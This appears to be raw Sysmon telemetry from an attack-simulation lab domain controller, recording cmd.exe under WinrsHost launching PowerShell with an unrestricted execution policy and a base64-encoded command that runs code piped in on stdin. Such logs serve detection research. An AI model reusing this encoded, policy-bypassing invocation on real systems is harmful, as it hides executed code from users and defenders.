UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-6439-6064-C502-00000000AD01}45444704C:\Windows\system32\WinrsHost.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.785{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\A